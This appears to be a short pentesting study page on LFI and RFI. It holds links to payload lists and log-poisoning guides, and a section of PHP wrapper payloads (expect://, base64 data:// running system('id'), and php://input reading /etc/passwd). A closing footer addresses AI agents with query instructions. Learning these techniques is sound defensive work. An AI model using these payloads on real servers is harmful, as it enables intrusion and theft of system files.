# LFI & RFI

**Local File Inclusion (LFI):**\
An attacker can use this vulnerability to include files stored on the same server as the vulnerable web application. Here, an attacker can leverage this vulnerability to include sensitive files, including configuration files, system files, or other files containing credentials or sensitive data.

**Remote File Inclusion (RFI):**\
In RFI, an attacker can include any arbitrary file from a remote location and execute arbitrary code on the target server. Here, an attacker can leverage this vulnerability to execute malicious code, install malware, or gain unauthorized access to the server.

## Path Separators:

* Unix-like OS:
  * root directory: `/`
  * directory separator: `/`
* Windows OS:
  * root directory: `<drive letter>:`
  * directory separator: `\` or `/`
* Classic macOS:
  * root directory: `<drive letter>:`
  * directory separator: `:`

## payload

<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion>

## Lfi to RCE:

### log file poisoning attack:

* <https://medium.com/@josewice7/lfi-to-rce-via-log-poisoning-db3e0e7a1cf1>
* <https://owasp.org/www-community/attacks/Log_Injection>

### Php Wprappers attack:

<pre><code><strong>?page=expect://id       //to check permission
</strong><strong>?page=data://text/plain;base64,[command encoded in base64]  
</strong><strong>?page=data://text/plain;base64,JTNDJTNGc3lzdGVtJTI4JTI3aWQlMjclMjklM0IlM0YlM0U=    //?page=data://text/plain,&#x3C;?system('id');?> 
</strong><strong>?page=php://input&#x26;cmd=cat%20/etc/passwd 
</strong></code></pre>

## Tools

* [dotdotpwn](https://github.com/wireghoul/dotdotpwn)
*


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://shahidulandshamim.gitbook.io/web-application/exploitation/lfi-and-rfi.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.